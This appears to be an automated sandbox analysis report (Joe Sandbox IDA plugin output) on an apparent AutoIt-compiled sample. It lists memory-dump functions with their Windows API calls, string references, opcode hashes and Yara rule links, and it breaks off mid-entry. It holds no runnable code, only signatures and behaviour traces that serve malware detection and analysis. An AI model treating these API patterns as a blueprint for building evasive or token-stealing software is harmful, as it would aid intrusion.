Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: acef03ea5ead20595eb3774a8ec36df25595b9dbb1d186b1f7aecdc6e508397c
Instruction ID: e0cf4193844c083e47275fd5a6aad5c433ecf5d422b9547bbd4b278ad49c4a8a
Opcode Fuzzy Hash: acef03ea5ead20595eb3774a8ec36df25595b9dbb1d186b1f7aecdc6e508397c
Instruction Fuzzy Hash: 09E0ED31604248BBDF625FA8AC49BD83B21FB56336F148366FA79980E287754990DF12

Function 007C9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 007C9339
OpenThreadToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C8F04), ref: 007C934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,007C8F04), ref: 007C9354

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: ea71a4687b649a84fc78eeb2d962f71c54d9b0f7b266cfd0fe3c5facc6aea8b8
Instruction ID: 2bdba1924f0eb3bc1fdae743d6270d57d2359baceedc8d88396dae0dd6d7d346
Opcode Fuzzy Hash: ea71a4687b649a84fc78eeb2d962f71c54d9b0f7b266cfd0fe3c5facc6aea8b8
Instruction Fuzzy Hash: AFE04F726012119BD7A01FB25D0EB563B6CBF50792F11881CB285C9090E6389444CB50

Function 007B0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007B0679
GetDC.USER32(00000000), ref: 007B0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
ReleaseDC.USER32(?), ref: 007B06C4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 484e07f98a03ea68a972704869ae765d36a98d60a48b2b3b468e82d0cb52c0a7
Instruction ID: 18a6c93d5c047eb684290096bf83cb1c52b62ddfa0928620f7430af69cfd1137
Opcode Fuzzy Hash: 484e07f98a03ea68a972704869ae765d36a98d60a48b2b3b468e82d0cb52c0a7
Instruction Fuzzy Hash: 7CE0E5B1800704EFCF919FA0D808B9D7BB2BB9C350F118005F96AA7220CB3985519F50

Function 007B068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007B068D
GetDC.USER32(00000000), ref: 007B0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B06A3
ReleaseDC.USER32(?), ref: 007B06C4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 37643d7d4dca7d9e1f15099f65de91240edc7ecdd7745e3d281c306eb0c5458d
Instruction ID: cdd0483f23650e386e8de9fd454c4fe663e54e658ff019e4d40334f83d936ec7
Opcode Fuzzy Hash: 37643d7d4dca7d9e1f15099f65de91240edc7ecdd7745e3d281c306eb0c5458d
Instruction Fuzzy Hash: F1E012B1800704EFCF919FA0D808B9D7BF2BBAC350F108009F96AA7220CB3995518F50

Function 007DB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

__wcsnicmp.LIBCMT ref: 007DB670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007DB739

Strings

LPT, xrefs: 007DB66A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: e1ea3196d5f76cdd27c616dedb1cbf6772af1f64561f0311e293a59123ca231f
Instruction ID: 16d8a3434e8ab15bb468c6b044307da56571dbefdc19b51ee0389c11d3a27432
Opcode Fuzzy Hash: e1ea3196d5f76cdd27c616dedb1cbf6772af1f64561f0311e293a59123ca231f
Instruction Fuzzy Hash: 4E619375A00219EFCB14EF94C895EAEB7B4EF48310F05805BF546AB391DB78AE40CB94

Function 007B7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007B7237
_memmove.LIBCMT ref: 007B7291

Strings

#Vx, xrefs: 007B730B, 007BCAB3, 007BCACF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove
String ID: #Vx
API String ID: 4104443479-2004165239
Opcode ID: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
Instruction ID: 2ef45ba564db8081cefc57e84499d31085f12407bf8e82249f5d009305facdd5
Opcode Fuzzy Hash: 3945e4ae5e908bb5252e31cde469fca44b0dfc0a120e82842c90c0bc4ab87c0f
Instruction Fuzzy Hash: 49516070900609DFCF24CF68C884AEEBBF5FF85304F248529E85AD7250E735A955CB91

Function 0077E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0077E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 0077E037

Strings

@, xrefs: 0077E02B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 9f63c0af91e380f1227f07b3838a5119079888384f4704c01b5c6a398f4f80d7
Instruction ID: 80924d0e010cf2badacc72f8adc5357ebfe2a95cf63a3c62d79f9b2706be38e4
Opcode Fuzzy Hash: 9f63c0af91e380f1227f07b3838a5119079888384f4704c01b5c6a398f4f80d7
Instruction Fuzzy Hash: 5C516772508744DBE720AF10E88ABAFBBF8FF84354F41884CF2D8411A1DB749528CB66

Function 007F8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007F8186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F819B

Strings

', xrefs: 007F80EF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
Instruction ID: b691ca95371686e8cb32ae2d52989bde893928a95ee0006011cb81ae5da8ae33
Opcode Fuzzy Hash: 99d997dfa2c97bbccd3e635e02a92f158b7fe5de82473880a7ab62d1a1ea2dae
Instruction Fuzzy Hash: 55410874A0120D9FDB54CF68C881BEA7BB5FF08300F50056AEA18EB351DB35A956DF91

Function 007F7088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007F713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F7178

Strings

static, xrefs: 007F70D8

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 1067adbace64a12055c501057264ff99131c6124c7b72cdb90876b821cbd540d
Instruction ID: 1237f94ea8b8a0bbe1b42f20760cbd7008d1bd6f74cd3390f3aaf7e6303634bc
Opcode Fuzzy Hash: 1067adbace64a12055c501057264ff99131c6124c7b72cdb90876b821cbd540d
Instruction Fuzzy Hash: 6531B271100208EEDB149F78CC41BFB73A9FF88720F109619FAA987290DB35AC81CB60

Function 007D3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D30B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D30F3

Strings

0, xrefs: 007D30B1

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a19510f9500fa2ac0821cd4834d7e26cd2d7462f88e8fa50219ee1fd36982288
Instruction ID: e95d8b7f8ab77d8a0efd73917d0560e266874217a41f62f688fe18c2c1dd29cd
Opcode Fuzzy Hash: a19510f9500fa2ac0821cd4834d7e26cd2d7462f88e8fa50219ee1fd36982288
Instruction Fuzzy Hash: 1C31063160020EDBEB248F58D885FAEBBB9FF05340F14401AE885A63A0E7799B44CB52

Function 007E40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 007E4132

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 007E4124
, $, xrefs: 007E4172

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 5371745bf1420451ae35f7c61a7455bf3bc7032bc16ae4bc4f4daf9926412afe
Instruction ID: ecd9591da8395a0f556311b64aac41132ffc8946e6630b829f767f8eb9b0e93d
Opcode Fuzzy Hash: 5371745bf1420451ae35f7c61a7455bf3bc7032bc16ae4bc4f4daf9926412afe
Instruction Fuzzy Hash: 3621B131A4021CEBCF14EFA5D895EAE77B9FF58340F404458F914A7281DB38E985DBA2

Function 007F6CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F6D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F6D91

Strings

Combobox, xrefs: 007F6D53

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
Instruction ID: e6ff3b1315246e0b92db116980a9262c78f2f6f4406ec55d68e1bdb20202f2f1
Opcode Fuzzy Hash: 666d2332f1004f89c84e5aefa3234af75da7bdca72d03c1f8bcad91d22d7f66d
Instruction Fuzzy Hash: 1911827131020CBFEF219E54DC81EBB3B6BEB883A4F114525FA189B391D679DC519760

Function 007F722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D

GetWindowRect.USER32(00000000,?), ref: 007F7296
GetSysColor.USER32(00000012), ref: 007F72B0

Strings

static, xrefs: 007F7273

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
Instruction ID: 3ddddf66b6f3d9a65133422dc22c0263ea005f61a967cc3059e391f4d55e1e87
Opcode Fuzzy Hash: 52361ec64f8096e6ef7e0a1f3f945cd40dc9cc0db2ba07c586457e0765b82fa4
Instruction Fuzzy Hash: E621177261420AAFDB04DFA8CC45AFA7BB8FB08314F004519FE55D3251D639E851DB60

Function 007F6F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007F6FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F6FD6

Strings

edit, xrefs: 007F6FAB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
Instruction ID: 76aeb12ed153b4989cc1f442151d0eecfbbffeae2692f1c5dbc632bb1f259eba
Opcode Fuzzy Hash: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
Instruction Fuzzy Hash: 55113A7150020CABEB509E64EC84EBB3BAAEB15368F504714FA75972E0C77ADC51AB60

Function 007D3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D31C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007D31E8

Strings

0, xrefs: 007D31BF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
Instruction ID: 6a0b15f1357843bf38cf8dde542860631c8f57395c30815e2037dc69118cad17
Opcode Fuzzy Hash: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
Instruction Fuzzy Hash: 1D11E27290051EEBDB20DA98DC45B9D77B8BB45310F140123E955E73A0D77AEF09CB92

Function 007E8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007E849D,?,00000000,?,?), ref: 007E86F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
htons.WSOCK32(00000000,?,00000000), ref: 007E84DD

Strings

255.255.255.255, xrefs: 007E84B8

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
Instruction ID: 673872c5b5522a0c44b8caddcbb20178d7f2ba2264ff100891e9cd42dc66d28e
Opcode Fuzzy Hash: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
Instruction Fuzzy Hash: F911C83510125AABDB20EF64DC46FBEB724FF09320F10851BF915972D1DB76A814CB56

Function 007C99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C9A2B

Strings

ListBox, xrefs: 007C99F5
ComboBox, xrefs: 007C99CA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
Instruction ID: d7233d356cae69eec69061a75e5279684a7611997ae6c61d89da29af252bdc5f
Opcode Fuzzy Hash: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
Instruction Fuzzy Hash: B901C471941124AB8B14FBA4CC5ADFE736DAF51310B40060DF871532C1EE3958089760

Function 007D934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D9367
__fread_nolock.LIBCMT ref: 007D937C

Strings

EA06, xrefs: 007D93AE

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
Instruction ID: 162bceddeca33d03de999cdfc60086f980364920ac3e7cf77db6ba8ff43da2c7
Opcode Fuzzy Hash: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
Instruction Fuzzy Hash: AE01F972804268BEDF18C6A8DC5AEFEBBF8DB15301F00419BF552D2281E579E6148760

Function 007C98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 007C9923

Strings

ListBox, xrefs: 007C98ED
ComboBox, xrefs: 007C98C2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
